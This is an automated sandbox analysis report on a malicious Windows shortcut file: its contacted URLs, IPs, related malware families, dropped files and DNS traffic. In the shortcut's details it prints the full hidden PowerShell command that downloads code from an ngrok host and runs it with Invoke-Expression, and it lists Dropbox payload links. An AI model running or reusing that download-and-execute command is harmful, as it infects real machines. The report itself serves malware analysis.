https://anglebug.com/7604	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7761	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7760	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5901	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3965	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6439	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7406	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7161	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7162	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppu	powershell.exe, 0000000F.00000002.2247336096.000001CA08B96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2247873077.000001CA08E14000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anglebug.com/5906	msedge.exe, 00000006.00000003.1642074850.0000584000398000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2517	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/MergeSession	msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4937	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/166809097	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://issuetracker.google.com/200067929	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7847	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod/C:	svchost.exe, 00000007.00000003.1634603766.0000024B7CC81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/fsip/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3832	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/Logout	msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.com	powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.125.65.18	www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false
162.125.69.15	edge-block-www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
104.161.43.18	unknown	United States	53755	IOFLOODUS	true
172.64.41.3	unknown	United States	13335	CLOUDFLARENETUS	false
3.125.102.39	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	United States	16509	AMAZON-02US	false
3.6.122.107	unknown	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.251.40.161	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.8
192.168.2.22
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576697
Start date and time:	2024-12-17 12:12:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	pkqLAMAv96.lnk renamed because original name is a hash value
Original Sample Name:	09f8248e67a54fec5a43f9afe0924963a7ab783c16481a2801519c2d14ed8ee1(1).lnk
Detection:	MAL
Classification:	mal100.troj.evad.winLNK@82/282@20/12
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 217.20.58.100, 172.217.19.206, 13.107.6.158, 13.107.42.16, 13.107.21.239, 204.79.197.239, 23.32.238.138, 2.19.198.56, 2.16.229.162, 2.16.158.50, 2.16.158.48, 2.16.158.40, 2.16.158.72, 2.16.158.35, 2.16.158.43, 2.16.158.51, 2.16.158.56, 2.16.158.58, 23.32.238.163, 20.82.9.214, 2.20.68.223, 2.20.68.206, 192.229.221.95, 199.232.210.172, 104.208.16.94, 142.250.65.227, 172.217.165.131, 142.250.72.99, 142.250.64.99, 142.250.80.67, 142.251.40.99, 142.251.40.227, 52.149.20.212, 94.245.104.56, 20.190.159.0, 13.107.246.63, 172.183.192.109, 13.107.246.40, 20.25.227.174, 23.44.201.21, 23.200.0.6
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, edgeassetservice.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com, www.bing.com, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, blobcollector.events.data.trafficmanager.net, edgeassetservice.azureedge.net, umwatson.events.data.microsoft.com, clients.l.google.com, config.edge.skype.com.trafficmanager.net, fs-wildca
Execution Graph export aborted for target f403e587-89ca-44df-ac2b-662ec52ae877.exe, PID 8692 because there are no executed function
Execution Graph export aborted for target fontdrvhost.exe, PID 8808 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 8376 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: pkqLAMAv96.lnk

Simulations

Behavior and APIs

Time	Type	Description
06:13:15	API Interceptor	41118x Sleep call for process: powershell.exe modified
06:13:30	API Interceptor	2x Sleep call for process: svchost.exe modified
06:15:01	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.159.61.3	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	33abb.msi	Get hash	malicious	Unknown	Browse
	56ff7c.msi	Get hash	malicious	Unknown	Browse
	57ff67.msi	Get hash	malicious	Unknown	Browse
	427c7bdc-ea02-97de-e5ef-a2c58c2d0a48.eml	Get hash	malicious	Unknown	Browse
162.125.65.18	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	[EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.eml	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	Updates.bat	Get hash	malicious	Abobus Obfuscator	Browse
	ljshdfglksdfNEW.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	QD40FIJ8QK.lnk	Get hash	malicious	Unknown	Browse
	https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4I	Get hash	malicious	Unknown	Browse
162.125.69.15	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse
	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	l92fYljXWF.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	Richiesta di Indagine sulla Violazione del Copyright lnk.lnk	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fg.microsoft.map.fastly.net	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	199.232.214.172
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	199.232.210.172
	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	l92fYljXWF.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	Richiesta di Indagine sulla Violazione del Copyright lnk.lnk	Get hash	malicious	Unknown	Browse	199.232.210.172
	EgnyteDesktopApp_3.17.1_144.msi	Get hash	malicious	Unknown	Browse	199.232.210.172
chrome.cloudflare-dns.com	#U041e#U043f#U043b#U0430#U0442#U0430.xls	Get hash	malicious	Unknown	Browse	172.64.41.3
	wayneenterprisesbatcave-6.0.1901-windows-installer.msi	Get hash	malicious	ScreenConnect Tool	Browse	172.64.41.3
	Setup.exe (1).zip	Get hash	malicious	Unknown	Browse	172.64.41.3
	Smple_Order-048576744759475945.xls	Get hash	malicious	Unknown	Browse	162.159.61.3
	BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xls	Get hash	malicious	Unknown	Browse	162.159.61.3
	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.159.61.3
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	172.64.41.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DROPBOXUS	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	162.125.69.15
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	162.125.69.15
	2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	162.125.69.15
	https://dashboard.sizle.io/p/f7c9cdf19	Get hash	malicious	HTMLPhisher	Browse	162.125.69.18
	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.18
	garsukhjdf11.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	nbavdfasfGarminde.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
DROPBOXUS	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	162.125.69.15
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	162.125.69.15
	2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	162.125.69.15
	https://dashboard.sizle.io/p/f7c9cdf19	Get hash	malicious	HTMLPhisher	Browse	162.125.69.18
	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.18
	garsukhjdf11.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	nbavdfasfGarminde.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse	3.125.102.39 3.6.122.107 162.125.65.18 162.125.69.15
	uEhN67huiV.dll	Get hash	malicious	Unknown	Browse	3.125.102.39 3.6.122.107 162.125.65.18 162.125.69.15
	JkICQ13OOY.dll	Get hash	malicious	Unknown	Browse	3.125.102.39 3.6.122.107 162.125.65.18 162.125.69.15
	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	3.125.102.39 3.6.122.107 162.125.65.18 162.125.69.15
	Clienter.dll.dll	Get hash	malicious	Unknown	Browse	3.125.102.39 3.6.122.107 162.125.65.18 162.125.69.15
	JkICQ13OOY.dll	Get hash	malicious	Unknown	Browse	3.125.102.39 3.6.122.107 162.125.65.18 162.125.69.15
	Clienter.dll.dll	Get hash	malicious	Unknown	Browse	3.125.102.39 3.6.122.107 162.125.65.18 162.125.69.15
	http://85off-lv.com	Get hash	malicious	Unknown	Browse	3.125.102.39 3.6.122.107 162.125.65.18 162.125.69.15
	V65xPrgEHH.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	3.125.102.39 3.6.122.107 162.125.65.18 162.125.69.15
	fGZLZhXIt1.bat	Get hash	malicious	Unknown	Browse	3.125.102.39 3.6.122.107 162.125.65.18 162.125.69.15

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8240435961866016
Encrypted:	false
SSDEEP:	1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAg:RJE+Lfki1GjHwU/+vVhWqp1
MD5:	58CA897E47AE76E568D1E9FDE3146F52
SHA1:	5C340FA3E8A46E69AF607FC83904EE83D7358322
SHA-256:	209EE1B63B68C56954CE27A272E7720D8E761A0EF7C975F3438254FA4D65B4B7
SHA-512:	0E4F27D03AC8D708F913E12252001F33E4EE2C5DDC231F1E904BE7A2ED48B04DC8C2429003EFA294BE3FA9F50BF24184E7676DA282249492D398CA30B77F4CE0
Malicious:	false
Preview:	..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6603655249191798
Encrypted:	false
SSDEEP:	96:5YFuT13eVqigKJQs3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZAX/S:yETlCHnQxR0apYKjqzuiF3Z24lO8JO
MD5:	5AD64088E5A7D6C9EBA387DF53214AA0
SHA1:	E85BD0C17A2242912A2A48B84D750445095A9272
SHA-256:	E542A6F139F9BB483CF144F58ED49AA52D00563C416255B75E842749CFCF6E1D
SHA-512:	B365765FE895AA3992283A9448D6C3277E9A47EE2FC74232695A810A34F7FE1C84337D472324956BB089D3172304EEDDEE4504D01105181232CCB2684A752A88
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.0.7.6.9.6.9.6.5.4.2.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.0.7.6.9.7.2.4.6.6.7.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.d.a.5.f.1.9.-.1.a.f.5.-.4.f.6.c.-.8.4.e.0.-.e.d.e.f.0.8.2.2.1.a.2.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.9.b.e.2.1.3.-.4.d.f.9.-.4.5.c.3.-.b.c.3.0.-.b.4.2.0.a.2.b.7.7.9.2.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.f.c.-.0.0.0.1.-.0.0.1.4.-.e.3.9.b.-.a.b.e.5.7.4.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	45654
Entropy (8bit):	6.0884171057072205
Encrypted:	false
SSDEEP:	768:UMkbJrT8IeQc5SKO+jHLmZuN6mkKnhjVIbYHQhv5ZCC1ojwWE7RTupzKscDX//NC:UMk1rT8HKKhN6mNQh3CIojoRTuio
MD5:	F1868965CE90194D987FFAE480F74FBF
SHA1:	AA0D0A2D7222BF81A57BBB32736120814CBB2F31
SHA-256:	15E5F296348CCE535F8BCE07C30A8847CD5A6D15B36749F029A2B50EE4E09BE6
SHA-512:	693DCE47A08EF062748E2884B7504238846F6DDCAA512BAE34AC4870917F3FDFE4A8BB701AA06A1AA1FC700C4FAFA463BD658D01E41818C9FBD7A5D65C29E10C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734434016"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	61147
Entropy (8bit):	5.0779483220981145
Encrypted:	false
SSDEEP:	1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHaqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPI
MD5:	A76FC79CC71F2C9A6023862053AC8DAA
SHA1:	F44A5893A9D2288B73C827F1853940EBEACDB9DF
SHA-256:	F798F95B18AE3C02C1741996B103531626B0F9E980DD2177DB80B8C45B539DC7
SHA-512:	F4EA42545E59C742F0AD00D3D4DF4726527365E20B7A5BEA212B2B1722D6E13ED9DF34326A3326352F44711F28C57FCFAF7443BB6B375725B33A641E717AA871
Malicious:	false
Preview:	PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
Entropy (8bit):	3.7270228059176795
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	pkqLAMAv96.lnk
File size:	2'598 bytes
MD5:	9436a53ad2403b16af623a46efe0aaf2
SHA1:	2beb0c794491ef17fe11d4ea531e1ed725487a82
SHA256:	09f8248e67a54fec5a43f9afe0924963a7ab783c16481a2801519c2d14ed8ee1
SHA512:	4d024fa65bae876330921bb9f9342613a2225b9f0ed90cf58933438ccb9d0227bf199423318f0957e207da9a253178bc5e3d24d7f7dc91b6fa137560bc121010
SSDEEP:	48:8GIgax4PsU/WuWWGnBrIBGd0lL4XuH4Xv3SsgoQYk:8fgaxEs2WuWWwcBdl2uWvZg5Y
TLSH:	5951FB212FD81738E3F34E3289B7B2418A7BF946AC324F2E405446880862B05DC79F2B
File Content Preview:	L..................F.@.. ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......

General
Relative Path:	..\..\..\..\Windows\System32\cmd.exe
Command Line Argument:	/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 12:13:18.668986082 CET	192.168.2.8	1.1.1.1	0xee90	Standard query (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:22.430943012 CET	192.168.2.8	1.1.1.1	0x3a8a	Standard query (0)	www.dropbox.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:25.154380083 CET	192.168.2.8	1.1.1.1	0xa20a	Standard query (0)	ucc92cc8797dce098717f308293f.dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:33.248486042 CET	192.168.2.8	1.1.1.1	0x89d1	Standard query (0)	ucafc6786f84446e8965e5916cb2.dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:34.261358023 CET	192.168.2.8	1.1.1.1	0x8c3f	Standard query (0)	www.dropbox.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:13:34.261523962 CET	192.168.2.8	1.1.1.1	0x87f4	Standard query (0)	www.dropbox.com	65	IN (0x0001)	false
Dec 17, 2024 12:13:36.600404024 CET	192.168.2.8	1.1.1.1	0x5fb5	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
